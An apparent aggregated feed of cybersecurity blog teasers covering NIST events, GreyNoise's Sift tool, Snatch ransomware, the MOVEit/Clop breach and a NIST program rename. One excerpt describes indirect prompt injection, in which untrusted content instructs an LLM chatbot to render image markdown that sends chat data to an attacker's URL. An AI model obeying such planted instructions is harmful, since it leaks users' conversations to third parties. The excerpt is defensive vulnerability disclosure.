October is always an exciting time for us as we celebrate Cybersecurity Awareness Month and some of NIST’s greatest accomplishments, resources, guidance, and latest news in the cybersecurity space. This year is a big one because 2023 marks the 20 th anniversary of this important initiative —and we will celebrate in various ways every day throughout the month. What is NIST Up to in October? We’ll be using our NIST Cybersecurity Awareness Month website to share information about our events, resources, blogs, and how to stay involved. We will be using our NISTcyber X account as a vehicle to
The blog post introduces Sift, a new tool from GreyNoise that helps threat hunters filter out noise and prioritize investigation of potentially malicious web traffic. Sift uses AI techniques like large language models to analyze HTTP requests seen across GreyNoise's sensor network and generate reports on new and relevant threats. The reports describe and analyze suspicious payloads, estimate the threat level, provide contextual tags/information on associated IPs, and suggest Suricata rules to detect similar traffic. This allows analysts to focus only on the most critical potential threats instead of sifting through millions of requests manually. Sift is currently limited to HTTP traffic but will expand to other protocols soon. The post invites readers to provide feedback on how to further develop Sift's capabilities, such as expanding historical reports, customizing for specific organizations, analyzing submitted PCAPs, and integrating additional GreyNoise data/tools.
Earlier this week, KrebsOnSecurity revealed that the darknet website for the Snatch ransomware group was leaking data about its users and the crime gang's internal operations. Today, we'll take a closer look at the history of Snatch, its alleged founder, and their claims that everyone has confused them with a different, older ransomware group by the same name.
Large Language Model (LLM) applications and chatbots are quite commonly vulnerable to data exfiltration. In particular data exfiltration via Image Markdown Injection is quite frequent.
Microsoft fixed such a vulnerability in Bing Chat, Anthropic fixed it in Claude, and ChatGPT has a known vulnerability as Open AI “won’t fix” the issue.
This post describes a variant in the Azure AI Playground and how Microsoft fixed it.
From Untrusted Data to Data Exfiltration When untrusted data makes it into the LLM prompt context it can instruct the model to inject an image markdown element.
During an Indirect Prompt Injection Attack an adversary can exfiltrate chat data from a user by instructing ChatGPT to render images and append information to the URL (Image Markdown Injection), or by tricking a user to click a hyperlink.
Sending large amounts of data to a third party server via URLs might seem inconvenient or limiting…
Let’s say we want something more, aehm, powerful, elegant and exciting.
ChatGPT Plugins and Exfiltration Limitations Plugins are an extension mechanism with little security oversight or enforced review process.
Summary
***Updated September 28, 2023***
The 0-day vulnerability in the MOVEit file transfer software that was taken advantage of by the Clop ransomware group continues to make headlines. These disclosures are not new attacks, they are the result of the bad actor group parsing through the stolen data, discovering, and informing victims that had not yet been found in the data.
***Updated June 16, 2023***
A 0-day vulnerability in the MOVEit file transfer software was taken advantage of by the Clop ransomware
The Human-Centered Cybersecurity program (formerly Usable Cybersecurity) is part of the Visualization and Usability Group at NIST. It was created in 2008, but we’ve known for quite some time that we needed to rename our program to better represent the broader scope of work we provide for the cybersecurity practitioner and IT professional communities. We made the decision to update the name to Human-Centered Cybersecurity to better reflect our new (but long-time practiced) mission statement, “ championing the human in cybersecurity.” With our new name, we hope to highlight that usability still